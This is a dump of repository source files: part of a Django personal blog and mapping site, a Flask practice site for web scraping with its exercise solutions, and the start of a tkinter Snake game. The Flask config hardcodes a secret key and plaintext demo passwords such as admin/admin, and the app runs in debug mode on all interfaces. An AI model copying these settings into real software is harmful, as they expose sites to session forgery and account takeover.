"text": "from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.urls import reverse, reverse_lazy\nfrom .models import Post, BlogImage\nfrom .forms import PostForm\n\n# Create your views here.\nclass PostListView(ListView):\n model = Post\n template_name = 'blog_app/blog_list.html'\n context_object_name = 'posts'\n paginate_by = 10\n\n def get_queryset(self):\n queryset = Post.objects.filter(is_private=False).order_by('-date_updated')\n return queryset\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog_app/blog_detail.html'\n context_object_name = 'post'\n\n def get_context_data(self, **kwargs):\n ctx = super(PostDetailView, self).get_context_data(**kwargs)\n ctx['images'] = BlogImage.objects.filter(blog=self.get_object()).filter(is_main=False)\n ctx['posts'] = Post.objects.all().exclude(id=self.get_object().id).order_by('date_updated')[:5][::-1]\n return ctx\n\nclass PostCreateView(CreateView):\n model = Post\n form_class = PostForm\n template_name = 'blog_app/blog_form.html'\n\nclass PostUpdateView(UpdateView):\n model = Post\n form_class = PostForm\n template_name = 'blog_app/blog_form.html'\n\n def get_context_data(self, **kwargs):\n ctx = super(PostUpdateView, self).get_context_data(**kwargs)\n ctx['images'] = BlogImage.objects.filter(blog=self.get_object())\n return ctx\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'blog_app/blog_delete.html'\n success_url = reverse_lazy('blog_app:list')\n"
},
{
"alpha_fraction": 0.6052922010421753,
"alphanum_fraction": 0.6119073629379272,
"avg_line_length": 21.674999237060547,
"blob_id": "ae7f932519df6b22e86b9fc8b0c331bdc8269ff2",
"content_id": "feac53b678513d573d310a06414e2d3edc17fb4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 40,
"path": "/sitemaps.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.contrib.sitemaps import Sitemap\nfrom django.urls import reverse\nfrom blog_app.models import Post\nfrom hike_app.models import Hike\n\nclass StaticViewSitemap(Sitemap):\n priority = 0.5\n changefreq = 'monthly'\n\n def items(self):\n return ['index',\n 'legal',\n 'contact',\n 'blog_app:list',\n 'watershed_app:map']\n\n def location(self, item):\n return reverse(item)\n\n\nclass BlogSitemap(Sitemap):\n changefreq = \"weekly\"\n priority = 0.5\n\n def items(self):\n return Post.objects.all()\n\n def location(self, item):\n return reverse('blog_app:detail', args=[str(item.slug)])\n\n\nclass HikeSitemap(Sitemap):\n changefreq = \"monthly\"\n priority = 0.5\n\n def items(self):\n return Hike.objects.all()\n\n def location(self, item):\n return reverse('hike_app:detail', args=[str(item.slug)])\n"
},
{
"alpha_fraction": 0.7521186470985413,
"alphanum_fraction": 0.7521186470985413,
"avg_line_length": 32.71428680419922,
"blob_id": "a5fb520a8aa415c1c2bf414a7bf8da550315c87f",
"content_id": "583c64d55ac616cc7db49d3d6cd0b383e7fea162",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 14,
"path": "/blog_app/admin.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom markdownx.admin import MarkdownxModelAdmin\nfrom .models import Post, BlogImage\n\n# Register your models here.\nclass PostAdmin(MarkdownxModelAdmin):\n list_display = ['title', 'date_created', 'is_published', 'is_private']\n prepopulated_fields = {\"slug\": (\"title\",)}\n\nclass BlogImageAdmin(admin.ModelAdmin):\n list_display = ['blog', 'caption']\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(BlogImage, BlogImageAdmin)\n"
},
{
"alpha_fraction": 0.703290581703186,
"alphanum_fraction": 0.7077523469924927,
"avg_line_length": 42.73170852661133,
"blob_id": "09cd9ad65661a96993d0a836e87267353ba5dd8c",
"content_id": "ce39325266a306b7833ee9f5e11674e63881cdf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1793,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 41,
"path": "/mysite/urls.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.views.generic.base import TemplateView\nfrom . import views\n\nurlpatterns = [\n path('cookies/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')),\n path('robots.txt', TemplateView.as_view(template_name=\"robots.txt\", content_type=\"text/plain\"),),\n path('', views.IndexTemplateView.as_view(), name='index'),\n path('legal/', views.LegalTemplateView.as_view(), name='legal'),\n path('contact/', views.ContactFormView.as_view(), name='contact'),\n path('Trinidad-Hiking/', views.HikingTemplateView.as_view(), name='hiking'),\n path('Trinidad-Tobago-Watersheds/', views.WatershedMapTemplateView.as_view(), name='watersheds'),\n path('blog/', include('blog_app.urls')),\n path('markdownx/', include('markdownx.urls')),\n]\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns += [\n path('__debug__/', include(debug_toolbar.urls)),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.6894736886024475,
"alphanum_fraction": 0.7210526466369629,
"avg_line_length": 18,
"blob_id": "89f700c60847b1872ebe9aceab99d9c7626c8ce3",
"content_id": "80f70486409c72c2bfb067e8fe80ba4b2b11b679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/README.md",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "# My Website\n\n### Backend\nPython 3.6, Geodjango, GDAL, PostgreSQL, PostGIS\n\n### Front\nBootstrap, Leaflet, Mapbox, hopefully some D3 soon\n\n### Deploy\nAWS Elastic Beanstalk, RDS, S3, Route 53\n"
},
{
"alpha_fraction": 0.6600639224052429,
"alphanum_fraction": 0.6690095663070679,
"avg_line_length": 36.261905670166016,
"blob_id": "ffce573ad89c2511cdc6c0c07fb08848cbf9ca97",
"content_id": "e79af022603c151424444a98bf364f0e81aea82b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 42,
"path": "/mysite/views.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from django.views.generic import TemplateView, FormView\nfrom django.http import JsonResponse\nfrom django.core.mail import send_mail\nfrom blog_app.models import Post\nfrom .forms import ContactForm\n\nclass IndexTemplateView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n ctx = super(IndexTemplateView, self).get_context_data(**kwargs)\n ctx['private_posts'] = Post.objects.all()[:6]\n ctx['public_posts'] = Post.objects.filter(is_private=False)[:6]\n return ctx\n\nclass LegalTemplateView(TemplateView):\n template_name = 'legal.html'\n\nclass ContactFormView(FormView):\n form_class = ContactForm\n template_name = 'contact.html'\n\n def form_valid(self, form):\n \"\"\"If the form is valid, save the associated model.\"\"\"\n if self.request.is_ajax():\n name=form.cleaned_data['name']\n email=form.cleaned_data['email']\n message=form.cleaned_data['message']\n send_mail('Website Query from ' + name, message + \"\\n\\nReply to \" + name + \" at \" + email, '[email protected]', ['[email protected]',],\n fail_silently=False,\n )\n return JsonResponse({\"message\": \"Your message has bean sent. Returning to the home page now...\"})\n return super().form_valid(form)\n\nclass WatershedMapTemplateView(TemplateView):\n template_name = 'mapping/watershed_map.html'\n\nclass HikingTemplateView(TemplateView):\n template_name = 'mapping/hike_map.html'\n\ndef google_verify(request):\n return render(request, 'googlea70085b6066e71d7.html')\n"
},
{
"alpha_fraction": 0.6566015481948853,
"alphanum_fraction": 0.6802842020988464,
"avg_line_length": 30.27777862548828,
"blob_id": "b7d11cf189c205ee49b53a661d17ca258d83e5cc",
"content_id": "a3fba670b684704250e86af33925fb419192bc76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1689,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 54,
"path": "/mysite/settings/prod.py",
"repo_name": "leelum1/mysite",
"src_encoding": "UTF-8",
"text": "from .base import *\n\nDEBUG = False\n\nALLOWED_HOSTS = [\n # 'mysite-env.eba-ssxmmhfu.us-east-1.elasticbeanstalk.com',\n 'www.kevanleelum.com',\n # '172.31.20.208',\n ]\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = os.environ['EMAIL_HOST']\nEMAIL_PORT = os.environ['EMAIL_PORT']\nEMAIL_HOST_USER = os.environ['EMAIL_HOST_USER']\nEMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']\nEMAIL_USE_TLS = True\nEMAIL_TIMEOUT = 60\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n}\n\nAWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n}\n\nAWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\nAWS_S3_REGION_NAME = os.environ['AWS_S3_REGION_NAME']\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\nAWS_DEFAULT_ACL = None\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nSTATIC_LOCATION = 'static'\nSTATIC_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, STATIC_LOCATION)\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\n\nPUBLIC_MEDIA_LOCATION = 'media'\nMEDIA_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, PUBLIC_MEDIA_LOCATION)\nDEFAULT_FILE_STORAGE = 'custom_storages.PublicMediaStorage'\n"
}
] | 8 |
rush175/scrape.localhost | https://github.com/rush175/scrape.localhost | cdf8edfffe105201ab8d177e1cbf9ae0e94bf2b7 | 4a60fb3fed634741e1c4f372ce195a86731b4d14 | 1307a0645e102e98a208d791174f2485aa7853a4 | refs/heads/master | 2022-04-14T09:45:44.779274 | 2020-04-10T21:00:15 | 2020-04-10T21:00:15 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6742976307868958,
"alphanum_fraction": 0.6826222538948059,
"avg_line_length": 21.34883689880371,
"blob_id": "04c5c84b641560799646f9a51c09ef75d8aa90c8",
"content_id": "6e367c1a776649d8e70b270cef01e7c25b8b446c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 43,
"path": "/app.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template\nfrom flask_simplelogin import SimpleLogin, login_required\nimport config\n\napp = Flask(__name__, template_folder=\"templates\")\napp.config[\"SECRET_KEY\"] = config.secret\nSimpleLogin(app, login_checker=config.login_checker)\n\[email protected]('/')\ndef index():\n return render_template(\"index.html\")\n\[email protected]('/page')\ndef creatures():\n return render_template(\"page.html\")\n\[email protected]('/table')\ndef table():\n return render_template(\"table.html\")\n\[email protected]('/protected')\n@login_required()\ndef protected():\n return render_template(\"protected.html\")\n\[email protected]('/ocr')\ndef ocr():\n return render_template(\"ocr.html\")\n\[email protected]('/media')\ndef media():\n return render_template(\"media.html\")\n\[email protected]('/login')\ndef login():\n return render_template(\"login.html\")\n\[email protected]('/mvp')\ndef mvp():\n return render_template(\"mvp.html\")\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n"
},
{
"alpha_fraction": 0.5794872045516968,
"alphanum_fraction": 0.5794872045516968,
"avg_line_length": 20.66666603088379,
"blob_id": "ccba17c9dc69a09ac320f0311df40e73e135ed0c",
"content_id": "fd9c228e79eeb4c2d2fb9b97a58ad82514f5398c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 390,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 18,
"path": "/config.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "# Hi GitHub :)\n\nsecret = \"super-secret-secret\"\n\nusers = {\n \"admin\": {\"password\": \"admin\"},\n \"oreilly\": {\"password\": \"letmescrape\"},\n \"max\": {\"password\": \"i-like-gazpacho\"},\n}\n\n\ndef login_checker(user):\n user_data = users.get(user[\"username\"])\n if not user_data:\n return False\n elif user_data.get(\"password\") == user[\"password\"]:\n return True\n return False\n"
},
{
"alpha_fraction": 0.6709204316139221,
"alphanum_fraction": 0.6714634895324707,
"avg_line_length": 82.70454406738281,
"blob_id": "b79d178e6e4ed9fd99310852bee9f92af589d24c",
"content_id": "c39dc222a55f51c1435dbfba0e463bc440b8e33e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3683,
"license_type": "permissive",
"max_line_length": 281,
"num_lines": 44,
"path": "/templates/page.html",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block content %}\n<article>\n <aside>\n <h2>Page Demo</h2>\n </aside>\n</article>\n<br/>\n<div>\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Centaur\" title=\"Centaur\">Centaur</a>, a creature with a head and torso of a human and the body of a horse.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Chimera_(mythology)\" title=\"Chimera (mythology)\">Chimera</a>, a fire-breathing, three-headed monster with one head of a lion, one of a snake, and another of a goat, lion claws in front and goat legs behind, and a long snake tail.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Gorgons\" class=\"mw-redirect\" title=\"Gorgons\">Gorgons</a>, female monsters depicted as having snakes on their head instead of hair, and sometimes described as having tusks, wings and brazen claws.\n <ul><li><a href=\"https://en.wikipedia.org/wiki/Euryale_(Gorgon)\" title=\"Euryale (Gorgon)\">Euryale</a>, whose scream could kill.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Medusa\" title=\"Medusa\">Medusa</a>, whose gaze could turn anyone to stone.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Stheno\" title=\"Stheno\">Stheno</a>, most murderous of the sisters.</li></ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Griffin\" title=\"Griffin\">Griffin</a> or Gryphon or Gryps or Grypes, a creature that combines the body of a lion and the head and wings of an eagle.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Harpies\" class=\"mw-redirect\" title=\"Harpies\">Harpies</a>, creature with torso, head and arms of a woman, and talons, tail and wings (mixed with the arms) of a bird.\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Aello\" title=\"Aello\">Aello</a></li>\n <li><a href=\"https://en.wikipedia.org/wiki/Celaeno\" title=\"Celaeno\">Celaeno</a></li>\n <li><a href=\"https://en.wikipedia.org/wiki/Ocypete\" title=\"Ocypete\">Ocypete</a></li>\n </ul>\n </li>\n <li>Hydras\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Lernaean_Hydra\" title=\"Lernaean Hydra\">Lernaean Hydra</a>, also known as King Hydra, a many-headed, serpent-like creature that guarded an Underworld entrance beneath Lake <a href=\"https://en.wikipedia.org/wiki/Lerna\"\n title=\"Lerna\">Lerna</a>. It was destroyed by <a href=\"https://en.wikipedia.org/wiki/Heracles\" title=\"Heracles\">Heracles</a>, in his second <a href=\"https://en.wikipedia.org/wiki/Labours_of_Heracles\" class=\"mw-redirect\" title=\"Labours of Heracles\">Labour</a>.\n Son of Typhon and Echidna.</li>\n </ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Minotaur\" title=\"Minotaur\">Minotaur</a>, a monster with the head of a bull and the body of a man; slain by <a href=\"https://en.wikipedia.org/wiki/Theseus\" title=\"Theseus\">Theseus</a>.</li>\n <li>Multi-headed Dogs\n <ul>\n <li><a href=\"https://en.wikipedia.org/wiki/Cerberus\" title=\"Cerberus\">Cerberus</a>, the three-headed giant hound that guarded the gates of the Underworld.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Orthrus\" title=\"Orthrus\">Orthrus</a>, a two-headed dog, brother of Cerberus, slain by Heracles.</li>\n </ul>\n </li>\n <li><a href=\"https://en.wikipedia.org/wiki/Phoenix_(mythology)\" title=\"Phoenix (mythology)\">Phoenix</a>, a golden-red fire bird of which only one could live at a time, but would burst into flames to rebirth from ashes as a new phoenix.</li>\n <li><a href=\"https://en.wikipedia.org/wiki/Siren_(mythology)\" title=\"Siren (mythology)\">Sirens</a>, bird-like women whose irresistible song lured sailors to their deaths.</li>\n </ul>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6495388746261597,
"alphanum_fraction": 0.6587615013122559,
"avg_line_length": 19.513513565063477,
"blob_id": "0a4308e955771f9e488ef44289511c1d71130fe2",
"content_id": "dcc63b09882a2cafad493318f5f09b90fd04e19d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 37,
"path": "/solutions/05_media.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\nfrom shutil import rmtree as delete\nfrom urllib.request import urlretrieve as download\nfrom gazpacho import get, Soup\n\ndir = 'media'\nPath(dir).mkdir(exist_ok=True)\n\nbase = 'http://localhost:5000/'\nurl = base + '/media'\nhtml = get(url)\nsoup = Soup(html)\n\n# download images\n\nimgs = soup.find('img')\nsrcs = [i.attrs['src'] for i in imgs]\n\nfor src in srcs:\n name = src.split('/')[-1]\n download(base + src, f'{dir}/{name}')\n\n# download audio\n\naudio = soup.find('audio').find('source').attrs['src']\nname = audio.split('/')[-1]\ndownload(base + audio, f\"{dir}/{name}\")\n\n# download video\n\nvideo = soup.find('video').find('source').attrs['src']\nname = video.split('/')[-1]\ndownload(base + video, f\"{dir}/{name}\")\n\n# clean up\n\ndelete(dir)\n"
},
{
"alpha_fraction": 0.7579092383384705,
"alphanum_fraction": 0.763411283493042,
"avg_line_length": 22.45161247253418,
"blob_id": "5cc8a14a1f7512922834edd7468bd57e2caf64cb",
"content_id": "4c6f95bdfb127cc16c372de0f6f17b9ba821d809",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 31,
"path": "/solutions/03_protected.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from gazpacho import Soup\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\n\nurl = \"http://localhost:5000/protected\"\n\noptions = Options()\noptions.headless = True\nbrowser = Firefox(executable_path=\"/usr/local/bin/geckodriver\", options=options)\nbrowser.get(url)\n\n# username\nusername = browser.find_element_by_id(\"username\")\nusername.clear()\nusername.send_keys(\"admin\")\n\n# password\npassword = browser.find_element_by_name(\"password\")\npassword.clear()\npassword.send_keys(\"admin\")\n\n# submit\nbrowser.find_element_by_xpath(\"/html/body/main/form/button\").click()\n\n# refetch\nbrowser.get(url)\n\n# gazpacho\nhtml = browser.page_source\nsoup = Soup(html)\nsoup.find(\"blockquote\").remove_tags()\n"
},
{
"alpha_fraction": 0.717391312122345,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 13.076923370361328,
"blob_id": "76a167aefceba456e972c5c6abb66c5764478d38",
"content_id": "93deee1b7dcd0748ba7c7d2e0b87e20f23dd9801",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 187,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 13,
"path": "/README.md",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "### 🐉 scrape.localhost\n\nFlask App for Web Scraping Locally\n\n**Setup**\n\n```\npython -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\npython app.py\ndeactivate\n```\n\n"
},
{
"alpha_fraction": 0.6050724387168884,
"alphanum_fraction": 0.6213768124580383,
"avg_line_length": 18.034482955932617,
"blob_id": "92874eb99dcb66e38ad64f304a307415d7695efb",
"content_id": "94c0e1067b3cd622714a2b07294efc38a896812b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 29,
"path": "/solutions/02_table.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from gazpacho import get, Soup\n\nurl = \"http://localhost:5000/table\"\nhtml = get(url)\n\nsoup = Soup(html)\n\nsoup.find(\"td\", {'class': \"creature-name\"})\n\ntable = soup.find(\"table\")\ntrs = table.find(\"tr\")[1:]\n\ntr = trs[0]\n\nname = tr.find(\"td\", {\"class\": \"creature\"}, strict=False).text\nhabitat = tr.find(\"td\")[-1].text\n\ndef parse_tr(tr):\n name = tr.find(\"td\", {\"class\": \"creature\"}, strict=False).text\n habitat = tr.find(\"td\")[-1].text\n return name, habitat\n\n[parse_tr(tr) for tr in trs]\n\n####\n\nimport pandas as pd\n\ndf = pd.read_html(str(table))[0]\n"
},
{
"alpha_fraction": 0.6654275059700012,
"alphanum_fraction": 0.6765799522399902,
"avg_line_length": 18.925926208496094,
"blob_id": "7140e14563541a9108d2195e9915c3f94261b648",
"content_id": "634bb5245583dda9efbaab94277d0c738b46800a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 27,
"path": "/solutions/04_ocr.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from urllib.request import urlopen\nfrom gazpacho import get, Soup\nfrom PIL import Image # pip install pillow\nimport pytesseract # pip install pytesseract\n\nbase = 'http://localhost:5000'\nurl = base + '/ocr'\nhtml = get(url)\nsoup = Soup(html)\n\nsoup.find(\"img\")\n\nimgs = soup.find('img')\npaths = [i.attrs['src'] for i in imgs]\n\nimages = []\nfor path in paths:\n url = base + path\n im = Image.open(urlopen(url))\n images.append(im)\n\ntext = ''\nfor image in images:\n i2t = pytesseract.image_to_string(image)\n text += i2t\n\nprint(text)\n"
},
{
"alpha_fraction": 0.6332046389579773,
"alphanum_fraction": 0.6563706398010254,
"avg_line_length": 16.266666412353516,
"blob_id": "f0c8fa7f0e870992adb78bc987f3d7e1dd7b490e",
"content_id": "7d52d460ffc5e3963a4d456194a22bb00f3cf9c0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 15,
"path": "/solutions/01_page.py",
"repo_name": "rush175/scrape.localhost",
"src_encoding": "UTF-8",
"text": "from gazpacho import get, Soup\n\nurl = \"http://localhost:5000/page\"\nhtml = get(url)\n\nprint(html)\n\nsoup = Soup(html)\n\nsoup.find(\"div\").find(\"li\")[2]\n\ncreatures = soup.find(\"div\").find(\"li\")\ngorgons = creatures[2].find(\"ul\")\n\n[g.text for g in gorgons.find(\"a\")]\n"
}
] | 9 |
FlorianCahay/Snake | https://github.com/FlorianCahay/Snake | 8b964642c3dc74bd490240980754c2ba6c585a23 | f67354460e40b11f55b4c93c9755933f9065e0b1 | 50c218b9bf66727f4d1f3a6e67f26397e8825e9e | refs/heads/master | 2022-02-13T20:48:26.413882 | 2022-02-01T18:06:27 | 2022-02-01T18:06:27 | 185,679,758 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46724891662597656,
"alphanum_fraction": 0.48384279012680054,
"avg_line_length": 26.90243911743164,
"blob_id": "97c82be9fb76f7a2ad8bf6e8625dca64ce6aefdc",
"content_id": "460415971b4ceabdb9e7e72f4bbbe93b054be7b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1148,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 41,
"path": "/Snake.py",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "class Snake:\n def __init__(self, length):\n self.body = []\n self.length = length\n\n def move(self, direction):\n \"\"\"\n Déplace le serpent d'une case dans la direction donnée\n :param direction:\n :return:\n \"\"\"\n last_box = self.body[-1]\n if direction == \"Right\":\n self.body.append((last_box[0] + 1, last_box[1]))\n elif direction == \"Left\":\n self.body.append((last_box[0] - 1, last_box[1]))\n elif direction == \"Down\":\n self.body.append((last_box[0], last_box[1] + 1))\n elif direction == \"Up\":\n self.body.append((last_box[0], last_box[1] - 1))\n self.body.pop(0)\n\n def has_bitten(self):\n \"\"\"\n Vérifie si le serpent s'est mordu\n :return:\n \"\"\"\n head = self.body[-1]\n if head in self.body[:-1]:\n return True\n return False\n\n def eat(self, x, y):\n \"\"\"\n Mange une pomme et allonge la taille du serpent de 3\n :param x:\n :param y:\n :return:\n \"\"\"\n for i in range(3):\n self.body.insert(0, (x, y))\n\n"
},
{
"alpha_fraction": 0.5287559628486633,
"alphanum_fraction": 0.5436549186706543,
"avg_line_length": 33.6534309387207,
"blob_id": "16181a605ac278518e23b69082cc592d444e3605",
"content_id": "947c8540aa57ec21711ffaf67e1e394aa5412ebe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9619,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 277,
"path": "/Main.py",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import font\nfrom random import randint\nfrom Snake import Snake\n\n\nclass Interface:\n \"\"\"\n GUI\n \"\"\"\n\n def __init__(self):\n self.display_menu()\n self.window.mainloop()\n\n def init_var(self):\n \"\"\"\n Initialise les variables essentielles\n :return:\n \"\"\"\n self.difficulty = 1\n self.level = 1\n self.direction = \"Right\"\n\n def display_menu(self):\n \"\"\"\n Affiche la fenêtre de menu pour sélectionner la difficulté\n :return:\n \"\"\"\n self.init_var()\n if hasattr(self, 'window'):\n self.window.destroy()\n self.window = Tk()\n self.window.focus_force()\n self.window.resizable(0, 0)\n screen_length = 400\n widthBox = screen_length//(screen_length//10)\n self.canvas_menu = Canvas(self.window, width=screen_length, height=screen_length)\n self.canvas_menu.pack()\n self.set_font(\"Purisa\", 24)\n\n self.canvas_menu.create_text(screen_length//2, screen_length//6, text=\"SNAKE\", fill='green',\n font=self.font_title)\n easy = Button(self.canvas_menu, text=\"EASY\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(1))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+50, window=easy)\n medium = Button(self.canvas_menu, text=\"MEDIUM\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(2))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+100, window=medium)\n hard = Button(self.canvas_menu, text=\"HARD\", width=widthBox*3, activebackground=\"#d1d1d1\",\n command=lambda: self.select_difficulty(3))\n self.canvas_menu.create_window(screen_length//2, screen_length//3+150, window=hard)\n\n def select_difficulty(self, difficulty):\n \"\"\"\n Initialise la difficulté\n :param difficulty:\n :return:\n \"\"\"\n self.difficulty = difficulty\n self.canvas_menu.destroy()\n self.init_window()\n\n def set_font(self, _font, size):\n \"\"\"\n Créer des polices d'écritures\n :param _font:\n :param size:\n :return:\n \"\"\"\n self.font = font.Font(self.window, font=(_font, size))\n self.font.height = self.font.metrics(\"linespace\")\n self.font_title = font.Font(self.window, font=(_font, size*2))\n\n def init_window(self):\n \"\"\"\n Initialise la fenêtre du jeu en fonction de la diffculté choisie\n :param difficulty:\n :return:\n \"\"\"\n if hasattr(self, 'window'):\n self.window.destroy()\n self.window = Tk()\n self.window.focus_force()\n self.window.resizable(0, 0)\n self.set_font(\"Purisa\", 24)\n if self.difficulty == 1:\n self.screen_length = 800\n elif self.difficulty == 2:\n self.screen_length = 600\n elif self.difficulty == 3:\n self.screen_length = 400\n self.squares = self.screen_length // 10\n self.widthBox = self.screen_length // self.squares\n self.canvas = Canvas(self.window, width=self.screen_length, height=self.screen_length)\n self.canvas.pack()\n\n self.display_level_information(self.level)\n\n def display_level_information(self, level):\n \"\"\"\n Affiche une fenêtre avant le début du niveau\n :param level:\n :return:\n \"\"\"\n self.canvas.delete(ALL)\n self.window.bind(\"<Key-space>\", self.start)\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, 